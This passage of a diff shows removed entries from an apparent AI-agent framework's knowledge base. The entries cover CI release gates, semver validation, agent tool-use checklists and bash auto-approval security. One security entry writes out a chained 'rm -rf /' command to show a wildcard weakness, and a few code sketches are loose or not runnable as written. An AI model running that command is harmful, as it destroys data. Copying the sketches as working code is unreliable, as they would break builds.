Alternative approaches (re-running tests in release workflow or rebuilding artifacts) waste time and risk inconsistency.", - "code_example": "```yaml\n# ❌ INCORRECT - rebuild in release (drift risk)\nname: Release\non:\n workflow_dispatch:\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build # Rebuilt - may differ from CI!\n - uses: pypa/gh-action-pypi-publish@release/v1\n\n# ✅ CORRECT - reuse CI artifacts (deploy-what-you-test)\n# ci.yml (reusable)\nname: CI\non:\n workflow_call: # Can be called by other workflows\n pull_request:\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build\n - run: pytest\n - uses: actions/upload-artifact@v4\n with:\n name: dist\n path: dist/\n\n# release.yml\nname: Release\non:\n workflow_dispatch:\njobs:\n ci:\n uses: ./.github/workflows/ci.yml # Reuse CI workflow\n publish:\n needs: ci\n runs-on: ubuntu-latest\n steps:\n - uses: actions/download-artifact@v4\n with:\n name: dist\n path: dist/\n run-id: ${{ needs.ci.outputs.run_id }} # Same artifacts\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "ci-cd", - "github-actions", - "workflow-reuse", - "artifacts", - "deploy-what-you-test", - "consistency", - "workflow_call" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T21:43:28.723814+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0026", - "content": "Multi-Gate Release Validation: Add validation gates before irreversible operations (PyPI publish, Docker push, Git tag). Validate: 1) Tag format matches semver (v*.*.* pattern), 2) Tag version matches package metadata (__version__, pyproject.toml), 3) Artifacts exist and have expected format (.whl, .tar.gz), 4) Package quality checks pass (no syntax errors, imports work). 
Each gate should fail-fast with clear error message explaining what's wrong and how to fix. Prevents publishing broken releases that can't be deleted from PyPI.", - "code_example": "```yaml\n# ❌ INCORRECT - no validation, publishes broken releases\nname: Release\non:\n push:\n tags: ['v*']\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build\n - uses: pypa/gh-action-pypi-publish@release/v1 # No checks!\n\n# ✅ CORRECT - multi-gate validation\nname: Release\non:\n push:\n tags: ['v*']\njobs:\n validate:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n \n # Gate 1: Tag format validation\n - name: Validate tag format\n run: |\n if ! [[ \"${{ github.ref_name }}\" =~ ^v[0-9]+\\.[0-9]+\\.[0-9]+$ ]]; then\n echo \"Error: Tag must match semver (vX.Y.Z), got: ${{ github.ref_name }}\"\n exit 1\n fi\n \n # Gate 2: Version consistency\n - name: Validate version matches tag\n run: |\n TAG_VERSION=\"${GITHUB_REF_NAME#v}\" # Strip 'v' prefix\n PKG_VERSION=$(python -c \"import tomli; print(tomli.load(open('pyproject.toml', 'rb'))['project']['version'])\")\n if [[ \"$TAG_VERSION\" != \"$PKG_VERSION\" ]]; then\n echo \"Error: Tag version ($TAG_VERSION) != package version ($PKG_VERSION)\"\n exit 1\n fi\n \n # Gate 3: Artifact validation\n - run: python -m build\n - name: Validate artifacts exist\n run: |\n if ! 
ls dist/*.whl dist/*.tar.gz 1> /dev/null 2>&1; then\n echo \"Error: Expected .whl and .tar.gz in dist/\"\n exit 1\n fi\n \n # Gate 4: Quality checks\n - run: pip install dist/*.whl\n - run: python -c \"import map_framework\" # Import test\n \n publish:\n needs: validate # Only run if all gates pass\n runs-on: ubuntu-latest\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "ci-cd", - "release-management", - "validation", - "gates", - "semver", - "quality-assurance", - "fail-fast", - "github-actions" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0027", - "content": "Semver Regex Validation (Spec-Compliant): When validating semantic version format (vX.Y.Z), use Semver 2.0.0 spec-compliant regex that prohibits leading zeros in version components. Pattern: ^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$. The (0|[1-9][0-9]*) construct matches either '0' alone OR non-zero digit followed by any digits, rejecting v01.2.3 or v1.02.3 (spec violations). Simpler patterns like ^v[0-9]+\\.[0-9]+\\.[0-9]+$ accept invalid versions with leading zeros. Pattern proven: GitHub tag v0.01.0 passed simple regex but violated spec, causing package registry rejection. Use spec-compliant regex for validation gates before publishing.", - "code_example": "```bash\n# ❌ INCORRECT - accepts leading zeros (spec violation)\nSIMPLE_SEMVER='^v[0-9]+\\.[0-9]+\\.[0-9]+$'\necho \"v01.2.3\" | grep -qE \"$SIMPLE_SEMVER\" && echo \"Valid\" # Wrongly accepts!\n\n# ✅ CORRECT - Semver 2.0.0 spec-compliant (rejects leading zeros)\nSPEC_SEMVER='^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$'\n\n# Validation function\nvalidate_semver() {\n local tag=\"$1\"\n if [[ ! 
\"$tag\" =~ $SPEC_SEMVER ]]; then\n echo \"❌ Invalid semver: $tag\"\n echo \"Must match vX.Y.Z with no leading zeros (e.g., v1.2.3, v0.1.0)\"\n echo \"Violations: v01.2.3 (leading zero), v1.02.3 (leading zero)\"\n return 1\n fi\n echo \"✅ Valid semver: $tag\"\n return 0\n}\n\n# Test cases\nvalidate_semver \"v1.2.3\" # ✅ Valid\nvalidate_semver \"v0.1.0\" # ✅ Valid (0 without leading digit OK)\nvalidate_semver \"v01.2.3\" # ❌ Invalid (leading zero)\nvalidate_semver \"v1.02.3\" # ❌ Invalid (leading zero in minor)\n```", - "tags": [ - "semver", - "validation", - "regex", - "versioning", - "bash" - ], - "related_bullets": [ - "impl-0049" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T18:45:00.541231+00:00", - "last_used_at": "2025-10-25T18:45:00.541231+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0028", - "content": "Multi-Gate Validation for Automation Scripts: Before automation scripts modify state (git operations, file edits, package publishing), implement 5 validation gates: (1) Input Format - validate arguments match expected patterns before parsing, (2) Preconditions - check required files/tools exist before processing, (3) Business Logic - verify data meets domain rules (version consistency, no conflicts), (4) Pre-Execution - dry-run or preview changes before applying, (5) Post-Execution - verify expected state reached after modification. Each gate fails fast with actionable error message. Prevents cascading failures where invalid input causes partial state changes that are hard to rollback. 
Pattern proven: bump_version.sh script prevented broken release by catching version mismatch in gate 3 before git tag creation.", - "code_example": "```bash\n# ❌ INCORRECT - No validation, modifies state blindly\nbump_version.sh() {\n NEW_VERSION=\"$1\"\n sed -i \"s/__version__ = .*/__version__ = '$NEW_VERSION'/\" src/__init__.py\n git commit -am \"Bump version to $NEW_VERSION\"\n git tag \"v$NEW_VERSION\"\n git push --tags\n}\n# Risk: Invalid version format, inconsistent files, broken release\n\n# ✅ CORRECT - 5-gate validation before state changes\nbump_version.sh() {\n NEW_VERSION=\"$1\"\n \n # Gate 1: Input Format Validation\n if [[ ! \"$NEW_VERSION\" =~ ^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$ ]]; then\n echo \"❌ Gate 1 Failed: Invalid semver format '$NEW_VERSION'\"\n exit 1\n fi\n \n # Gate 2: Preconditions Check\n if [[ ! -f \"src/__init__.py\" ]] || [[ ! -f \"pyproject.toml\" ]]; then\n echo \"❌ Gate 2 Failed: Required files missing\"\n exit 1\n fi\n \n # Gate 3: Business Logic Validation\n PYPROJECT_VERSION=$(grep -oP 'version = \"\\K[^\"]+' pyproject.toml)\n if [[ \"$NEW_VERSION\" != \"$PYPROJECT_VERSION\" ]]; then\n echo \"❌ Gate 3 Failed: Version mismatch (input: $NEW_VERSION, pyproject: $PYPROJECT_VERSION)\"\n exit 1\n fi\n \n # Gate 4: Pre-Execution Preview\n echo \"Preview changes:\"\n echo \" - Update src/__init__.py: __version__ = '$NEW_VERSION'\"\n echo \" - Create git tag: v$NEW_VERSION\"\n read -p \"Proceed? (y/N) \" -n 1 -r\n [[ ! $REPLY =~ ^[Yy]$ ]] && exit 0\n \n # Apply changes\n sed -i \"s/__version__ = .*/__version__ = '$NEW_VERSION'/\" src/__init__.py\n git commit -am \"Bump version to $NEW_VERSION\"\n git tag \"v$NEW_VERSION\"\n \n # Gate 5: Post-Execution Verification\n ACTUAL_TAG=$(git describe --tags --exact-match 2>/dev/null)\n if [[ \"$ACTUAL_TAG\" != \"v$NEW_VERSION\" ]]; then\n echo \"❌ Gate 5 Failed: Tag creation failed (expected: v$NEW_VERSION, actual: $ACTUAL_TAG)\"\n exit 1\n fi\n \n echo \"✅ All gates passed. 
Version bumped to $NEW_VERSION\"\n}\n```", - "tags": [ - "validation", - "automation", - "bash", - "state-changes", - "error-prevention" - ], - "related_bullets": [ - "impl-0049" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T18:45:00.541231+00:00", - "last_used_at": "2025-10-25T18:45:00.541231+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0049", - "content": "Task Description Verb Precision for Tool Selection: When describing file operation subtasks, use precise action verbs (create/update/edit) and explicit file existence state to prevent Actor tool selection failures. Ambiguous verbs like 'add' cause Edit vs Write confusion - 'add entry to CHANGELOG.md' is ambiguous (create new file? modify existing?). Pattern: Ambiguous 'Add CHANGELOG.md entry' → Actor chose Write (creation) instead of Edit (modification) → Monitor detected no actual changes to existing file → Critical failure requiring rework. Use explicit verbs: 'Create new file X' (Write tool), 'Update existing file X with Y' (Edit tool), 'Modify section Z in file X' (Edit tool). 
This prevents tool selection errors that propagate through workflow.", - "code_example": "```markdown\n# ❌ AMBIGUOUS - causes tool selection failure\nSubtask 5: Add CHANGELOG.md initial release entry\n→ Actor interprets as 'create file' → uses Write tool\n→ File already exists → Write overwrites OR Actor claims creation without actual modification\n→ Monitor detects: git diff shows no changes → CRITICAL failure\n\n# ✅ PRECISE - explicit action and file state\nSubtask 5: Update CHANGELOG.md (existing file) by adding [1.0.0] initial release entry under [Unreleased] section\n→ Actor knows: file exists, needs Edit tool, target section specified\n→ Uses Edit tool with old_string/new_string\n→ Monitor verifies: git diff shows [1.0.0] section added → SUCCESS\n\n# Verb disambiguation guide:\n- \"Create X\" → Write tool (new file)\n- \"Update X with Y\" → Edit tool (modify existing)\n- \"Add entry to X\" → AMBIGUOUS (needs file state)\n- \"Add [1.0.0] section to CHANGELOG.md (existing)\" → Edit tool (explicit state)\n```", - "tags": [ - "task-description", - "tool-selection", - "actor", - "write-edit-confusion", - "map-framework", - "precision" - ], - "related_bullets": [ - "impl-0010", - "impl-0018" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T21:15:57.637760+00:00", - "last_used_at": "2025-10-25T21:15:57.637760+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0048", - "content": "Multi-File Consistency with Cross-Reference Comments: When validation logic (regex patterns, version formats, constraints) exists in multiple files (CI workflow + local script + docs), prevent drift with explicit cross-reference comments linking to source of truth. Format: '# CRITICAL: Must match regex in path/to/file.ext:line_number for consistency'. Prevents bugs where CI validates differently than local script, causing 'works locally, fails in CI' frustration. Update comments when moving logic. 
Choose single source of truth (usually newest/most comprehensive), reference it from all others.", - "code_example": "```yaml\n# .github/workflows/ci.yml\n- name: Validate version format\n run: |\n # IMPORTANT: Must match regex in scripts/bump-version.sh:139 for consistency\n semver_pattern = r'^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$'\n if not re.match(semver_pattern, version):\n sys.exit(1)\n```\n\n```bash\n# scripts/bump-version.sh:139\nvalidate_semver() {\n # NOTE: CI workflow validates with identical regex (.github/workflows/ci.yml:43)\n if [[ ! \"$version\" =~ ^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$ ]]; then\n die \"Invalid version format: $version\"\n fi\n}\n```", - "tags": [ - "consistency", - "validation", - "synchronization", - "multi-file", - "cross-reference", - "documentation" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0050", - "content": "Actor File Creation Verification Checklist: Actor agents sometimes describe code changes without executing Write/Edit tools, causing 'code in chat but file doesn't exist' failures. Add explicit mandatory checklist to Actor templates: '☐ Did you execute Write for new files? ☐ Did you execute Edit for existing files? ☐ All code persisted to disk (not just in chat)?'. Checklist prevents second occurrence of tool invocation failures observed in 2 separate workflows. Pattern: Actor claims 'Added validate-dependencies.py' → Monitor checks file existence → Not found → CRITICAL failure requiring rework. Complements existing impl-0042 (git diff verification) by adding proactive prevention before Monitor validation. Use structured checklist with checkboxes (not prose) to trigger explicit verification. 
This enforces tool invocation discipline - descriptions are not substitutes for Edit/Write execution.", - "code_example": "```markdown\n\n## Actor Output Validation (MANDATORY BEFORE SUBMITTING)\n\n- [ ] **File Creation Check**: Did you execute Write tool for ALL new files?\n - [ ] Verify: `ls -la ` returns file, not 'No such file'\n - [ ] NOT SUFFICIENT: Describing code in chat output\n \n- [ ] **File Modification Check**: Did you execute Edit tool for ALL existing files?\n - [ ] Verify: `git diff ` shows your changes\n - [ ] NOT SUFFICIENT: Providing code snippets without Edit invocation\n\n- [ ] **Code Persistence Check**: All code exists on disk (not just in chat)?\n - [ ] Run: `git status` shows new/modified files\n - [ ] CRITICAL: If git status shows nothing, you ONLY described changes\n\n**Error Prevention**: If you checked 'yes' but did NOT invoke Write/Edit tools:\n- Monitor will REJECT with: 'CRITICAL: File not found / Changes NOT applied'\n- You will need to re-execute entire subtask\n- Descriptions in chat do NOT create/modify files\n\n**Example Failure Pattern**:\n❌ Actor output: \"I created validate-dependencies.py with the following code: [code]\"\n❌ No Write tool invocation in action log\n❌ Monitor runs: `test -f validate-dependencies.py` → returns 1 (not found)\n❌ Result: CRITICAL failure, Actor must re-execute\n\n✅ Correct Pattern:\n✅ Actor invokes: Write(file_path=\"validate-dependencies.py\", content=\"...\")\n✅ Actor then describes what was created\n✅ Monitor runs: `test -f validate-dependencies.py` → returns 0 (exists)\n✅ Result: SUCCESS\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "impl-0042", - "impl-0043" - ], - "tags": [ - "actor", - "verification", - "checklist", - "tool-invocation", - "write", - "edit", - "persistence", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": 
"impl-0051", - "content": "Test-First Threshold for MAP Actor: Features >100 lines OR new components (classes, modules) MUST include tests in Actor's first iteration. Without tests: testability scores ≤3/10, guarantees Evaluator IMPROVE decision, forces second iteration. Test-to-code ratio target: 2:1 to 3:1 for new features (100 lines production code → 200-300 lines test code). Pattern proven: ASCIIGraphRenderer (284 lines) initially lacked tests → 3/10 testability → second iteration added 400+ lines tests → 9/10 testability. Test-first prevents 'beautiful code, zero testability' anti-pattern where Actor produces working implementation but Evaluator rejects for deployment readiness. Apply test-first threshold based on code size (>100 lines) or structural complexity (new classes/modules), not just feature type. Small utilities (<100 lines, single function) can defer tests, but frameworks/libraries MUST test first.", - "code_example": "```python\n# ❌ ANTI-PATTERN - Actor produces code without tests\nclass ASCIIGraphRenderer:\n def render(self, graph_data: dict) -> str:\n pass # 284 lines\n# Result: testability=3/10, IMPROVE decision\n\n# ✅ GOOD - Actor includes tests first iteration\nclass ASCIIGraphRenderer:\n def render(self, graph_data: dict) -> str:\n pass # 284 lines\n\n# tests/test_ascii_graph_renderer.py (400+ lines)\nclass TestASCIIGraphRenderer:\n def test_simple_graph_rendering(self):\n assert True\n# Result: testability=9/10, APPROVE decision\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "impl-0050", - "arch-0004" - ], - "tags": [ - "MAP", - "Actor", - "testing", - "testability", - "threshold", - "test-first" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0052", - "content": "Aggressive Deprecation Over Code Duplication for Developer Tools: When migrating developer-facing tools from dev scripts 
(scripts/) to production CLI (src/), replace original with deprecation stub instead of maintaining duplicates. Deprecation stub: print clear migration message, provide new command, exit 1. Rationale: Developer tools can tolerate breaking changes with documentation (unlike end-user apps). Code duplication doubles maintenance burden (746-line scripts/ + 684-line src/ = 2x bug surface). Developers read error messages and adapt workflows. Reserve code duplication for end-user applications where migration friction is unacceptable. Pattern proven: scripts/validate-dependencies.py (746 lines) duplicates src/mapify_cli/tools/validate_dependencies.py (684 lines) - deprecation stub better than maintaining both.", - "code_example": "```python\n# ❌ BAD - Maintain duplicate implementations\n# scripts/validate-dependencies.py (746 lines - DUPLICATE)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Full implementation duplicated from src/\n ...\n\n# src/mapify_cli/tools/validate_dependencies.py (684 lines - ORIGINAL)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Same implementation\n ...\n# Problem: Bug fix requires 2 changes, tests must cover both, 2x maintenance\n\n# ✅ GOOD - Deprecation stub in scripts/\n# scripts/validate-dependencies.py (10 lines - DEPRECATION STUB)\n#!/usr/bin/env python3\n\"\"\"DEPRECATED: This script has moved to the mapify CLI tool.\n\nMigration:\n Old: python scripts/validate-dependencies.py \n New: mapify validate validate-deps \n\nInstall: pip install mapify-cli\nDocs: https://github.com/azalio/map-framework#dependency-validation\n\"\"\"\nimport sys\n\nif __name__ == '__main__':\n print(__doc__, file=sys.stderr)\n print(\"\\nERROR: This script is deprecated. 
Use 'mapify validate validate-deps' instead.\", file=sys.stderr)\n sys.exit(1)\n\n# src/mapify_cli/tools/validate_dependencies.py (684 lines - SINGLE SOURCE OF TRUTH)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Only implementation, no duplicates\n ...\n\n# Update documentation (CONTRIBUTING.md, README.md)\n## Dependency Validation\n**OLD (deprecated):** `python scripts/validate-dependencies.py`\n**NEW:** `mapify validate validate-deps`\n\nThe script in scripts/ is deprecated and will be removed in v2.0.\n\n# Result: 1 implementation (684 lines), 1 stub (10 lines), clear migration path\n# Benefits: Single source of truth, reduced maintenance, forces tool adoption\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "impl-0008", - "arch-0010" - ], - "tags": [ - "deprecation", - "code-duplication", - "migration", - "developer-tools", - "maintenance", - "python", - "breaking-changes" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0054", - "content": "Documentation-Code Signature Validation for CLI Tools: When documenting CLI commands with usage examples, implement CI validation that parses both documentation examples and actual implementation signatures to detect drift. Pattern: (1) Extract CLI examples from markdown (regex: ```bash\\nmapify command --flag=value```), (2) Parse Typer function signatures from implementation (@app.command() decorators, function parameters, type hints), (3) Compare parameter names/types/defaults between docs and code, (4) Fail CI if mismatch detected. Prevents 'documentation rot' where examples become outdated after implementation changes (e.g., docs show validate-dependencies --file=path but implementation expects validate-dependencies file without --file flag). 
Common drift causes: parameter renames, type changes (str → Path), argument vs option changes. CI validation catches drift before users encounter errors.", - "code_example": "```python\n# ❌ DOCUMENTATION DRIFT (causes user errors)\n# USAGE.md example:\n# ```bash\n# mapify validate-dependencies --file=src/main.py\n# ```\n\n# But implementation signature:\n@app.command('validate-dependencies')\ndef validate_deps(\n file_path: Path = typer.Argument(..., help=\"Python file\") # Argument, not Option!\n):\n pass\n# Result: Users run --file flag, get \"no such option\" error\n\n# ✅ CI VALIDATION (prevents drift)\n# .github/workflows/validate-docs.yml\n- name: Validate CLI examples\n run: |\n python scripts/validate_cli_docs.py\n\n# scripts/validate_cli_docs.py\nimport re, ast, inspect\nfrom mapify_cli.tools.validate_app import app\n\n# Extract from docs\ndoc_examples = re.findall(r'```bash\\n(mapify .*?)\\n```', docs_content)\nfor example in doc_examples:\n cmd, *args = example.split()\n # Parse flags: --file=path → {\"file\": \"path\"}\n doc_params = parse_cli_args(args)\n \n # Extract from implementation\n func = app.registered_commands[cmd]\n sig = inspect.signature(func)\n impl_params = {name: param.annotation for name, param in sig.parameters.items()}\n \n # Compare\n if doc_params.keys() != impl_params.keys():\n raise ValueError(f\"Doc shows {doc_params.keys()}, impl expects {impl_params.keys()}\")\n\n# Result: CI fails on parameter mismatch, forces docs update\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847674Z", - "last_used_at": "2025-10-27T17:45:10.847683Z", - "related_bullets": [ - "impl-0046", - "impl-0047", - "arch-0014" - ], - "tags": [ - "documentation", - "cli", - "validation", - "ci", - "typer", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-workflow-risk", - "content": "MAP Workflow Selection by Risk Profile: Match validation intensity to change risk, not task count. 
Documentation-only changes (markdown, comments, READMEs) → MAP Efficient workflow (skip per-subtask Monitor/Predictor, batch Evaluator/Reflector). Production code (logic, APIs, schemas) → MAP Feature (full validation per subtask). Evidence-based decision: documentation workflow saved 35% tokens (97K vs 150K theoretical) with 0 errors across 7 subtasks. Risk profile determines workflow, not arbitrary 'simple vs complex' heuristic.", - "code_example": "```bash\n# Decision matrix for workflow selection\nif [[ $change_type == \"documentation\" ]] && [[ $touches_code == false ]]; then\n workflow=\"/map-efficient\" # 35% token savings\nelif [[ $change_type == \"production_code\" ]] || [[ $touches_logic == true ]]; then\n workflow=\"/map-feature\" # Full validation\nfi\n```", - "tags": [ - "map-framework", - "workflow-selection", - "risk-management", - "token-optimization" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143908" - }, - { - "id": "impl-atomic-decomposition", - "content": "Atomic Task Decomposition for Zero-Iteration Workflows: Break complex tasks into 7+ atomic subtasks with explicit success criteria (not 2-3 vague phases). Each subtask must have: single responsibility, clear input/output, independently verifiable success metrics (line counts, example counts, verification commands - NOT subjective 'looks good'). Prevents iteration loops by making acceptance criteria binary. 
Evidence: Sequential Thinking Integration decomposed into 7 atomic subtasks achieved 7/7 completion with 0 iterations vs typical 3-4 iterations for monolithic 'update documentation' task.", - "code_example": "```markdown\n# ❌ VAGUE\nSubtask 1: Update Monitor agent documentation\nSuccess: Documentation improved\n\n# ✅ ATOMIC\nSubtask 1: Add 'When to Use' section to Monitor agent\nOutput: Minimum 8 bullet points\nVerification: grep -c \"^-\" monitor.md (expect ≥8)\n```", - "related_to": [ - "impl-0014", - "impl-0049" - ], - "tags": [ - "task-decomposition", - "workflow-optimization", - "acceptance-criteria", - "zero-iteration" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143919" - }, - { - "id": "impl-actor-format", - "content": "Actor Content Generation Output Format Specification: When invoking Actor for content generation (documentation sections, code snippets, config files), explicitly request literal insertable format in prompt. Specify: 'Generate content for INSERTION at line X. Format: markdown/python/yaml. No summarization. Copy-pasteable.' Prevents Actor from summarizing output ('I added 3 examples...') instead of providing actual content, eliminating extraction step and avoiding format loss. 
Evidence: 3/3 Actor invocations for Sequential Thinking Integration required zero reformatting.", - "code_example": "```python\n# ❌ VAGUE PROMPT\nprompt = \"Add examples to Monitor agent\"\n# Result: \"I added 8 examples...\"\n\n# ✅ EXPLICIT FORMAT \nprompt = \"\"\"Generate for INSERTION at line 45.\nFormat: Markdown list.\nContent: 8 examples.\nNo explanatory text.\n\"\"\"\n# Result: Actual markdown ready for insertion\n```", - "related_to": [ - "impl-0050", - "impl-0018" - ], - "tags": [ - "actor-agent", - "content-generation", - "prompt-engineering", - "output-format" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143922" - } - ] - }, - "SECURITY_PATTERNS": { - "description": "Security best practices, authentication, authorization, and vulnerability prevention", - "bullets": [ - { - "id": "sec-0001", - "content": "PyPI OIDC Trusted Publishing: Use GitHub's OIDC provider to authenticate to PyPI instead of long-lived API tokens stored in secrets. Configure trusted publisher in PyPI web UI with repository details, then use pypa/gh-action-pypi-publish action with id-token: write permission. OIDC tokens are short-lived (minutes), scoped to specific workflow, and automatically rotated. Eliminates token leakage risk and secret management overhead. 
Requires one-time PyPI configuration: project name, repository owner, workflow filename.", - "code_example": "```yaml\n# ❌ INSECURE - long-lived token in GitHub secrets\nname: Publish\non: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n with:\n password: ${{ secrets.PYPI_API_TOKEN }} # Leakage risk, manual rotation\n\n# ✅ SECURE - OIDC trusted publishing (no secrets)\nname: Publish\non:\n push:\n tags: ['v*']\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions:\n id-token: write # Required for OIDC\n contents: read # Minimal permissions\n steps:\n - uses: actions/checkout@v4\n - uses: actions/setup-python@v5\n - run: python -m build\n - uses: pypa/gh-action-pypi-publish@release/v1\n # No password/token needed - OIDC automatic\n # PyPI trusts workflow via OIDC provider\n```", - "tags": [ - "security", - "ci-cd", - "github-actions", - "pypi", - "oidc", - "authentication", - "secrets-management", - "token-rotation" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0002", - "content": "GitHub Actions Least-Privilege Permissions: Explicitly set minimal permissions per workflow using top-level permissions key. Never use default permissions (read-write on all scopes). For OIDC publishing: id-token: write + contents: read only. Set permissions at job level for granular control. 
Default permissions grant unnecessary access that attackers can exploit via compromised dependencies or workflow injection.", - "code_example": "```yaml\n# ❌ INSECURE - uses default permissions (read-write on all scopes)\nname: Publish\non: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n # Default: contents:write, issues:write, pull-requests:write, etc.\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n\n# ✅ SECURE - explicit minimal permissions\nname: Publish\non: [push]\npermissions: # Top-level: deny all by default\n contents: read\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions: # Job-level: grant only what's needed\n id-token: write # For OIDC\n contents: read # For checkout\n steps:\n - uses: actions/checkout@v4\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "security", - "ci-cd", - "github-actions", - "least-privilege", - "permissions", - "access-control", - "oidc" - ], - "related_bullets": [ - "sec-0001" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0003", - "content": "Bash Command Auto-Approval Wildcard Security: Use exact matches without trailing wildcards for security-critical patterns. Wildcards create three attack vectors: (1) glob expansion (*.json* matches .json.bak), (2) binary prefix matches (jq* matches jq-exploit binary), (3) command chaining ([ -f file ]* allows arbitrary suffix commands). 
Fix: Remove all trailing wildcards, use space-delimited tokens (| jq * not | jq*), anchor strings exactly.", - "code_example": "```bash\n# ❌ INSECURE - wildcard patterns allow attacks\nauto_approve:\n - \"cat *.json*\" # Matches cat file.json.bak (unintended)\n - \"| jq*\" # Matches | jq-exploit binary (prefix attack)\n - \"[ -f graph.json ]*\" # Allows [ -f graph.json ] && rm -rf / (chaining)\n\n# ✅ SECURE - exact matches with space delimiters\nauto_approve:\n - \"cat graph.json\" # Exact filename only\n - \"| jq \" # Space after jq prevents binary prefix match\n - \"[ -f graph.json ]\" # No trailing wildcard prevents chaining\n - \"jq '.tasks'\" # Exact command with exact argument\n```", - "tags": [ - "security", - "bash", - "command-injection", - "wildcards", - "auto-approval", - "cli" - ], - "helpful_count": 5, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477528+00:00", - "last_used_at": "2025-10-27T19:38:54.477681+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0004", - "content": "Space-Delimited Binary Safety in Bash Patterns: Add mandatory space after command name in auto-approval patterns to prevent binary prefix attacks. Pattern '| jq*' matches any binary starting with 'jq' (jq-exploit, jqx), while '| jq ' (with space) only matches the jq binary followed by arguments. 
Bash tokenization splits on whitespace—space after command ensures exact binary match.", - "code_example": "```bash\n# ❌ INSECURE - no space allows binary prefix attacks\nauto_approve:\n - \"| jq*\" # Matches: | jq-exploit, | jqx, | jq_malicious\n - \"| grep*\" # Matches: | grep-backdoor, | grepx\n\n# ✅ SECURE - space enforces exact binary name\nauto_approve:\n - \"| jq \" # Only matches: | jq , not | jq-exploit\n - \"| grep \" # Only matches: | grep , not | grep-backdoor\n - \"git status\" # Space in command ensures exact 'git' binary\n\n# ✅ BEST - combine space delimiter with exact arguments\nauto_approve:\n - \"| jq '.tasks'\" # Exact binary + exact argument\n - \"git diff --cached\" # Exact binary + exact flags\n```", - "tags": [ - "security", - "bash", - "binary-prefix-attack", - "command-injection", - "tokenization", - "auto-approval" - ], - "helpful_count": 5, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477683+00:00", - "last_used_at": "2025-10-27T19:38:54.477684+00:00", - "related_bullets": [ - "sec-0003" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "PERFORMANCE_PATTERNS": { - "description": "Optimization techniques, caching strategies, and performance anti-patterns to avoid", - "bullets": [ - { - "id": "perf-0024", - "content": "Iterative Refinement ROI Optimization: When Evaluator rejects with IMPROVE decision, prioritize improvements by ROI (improvement potential / implementation cost). Calculate ROI for each 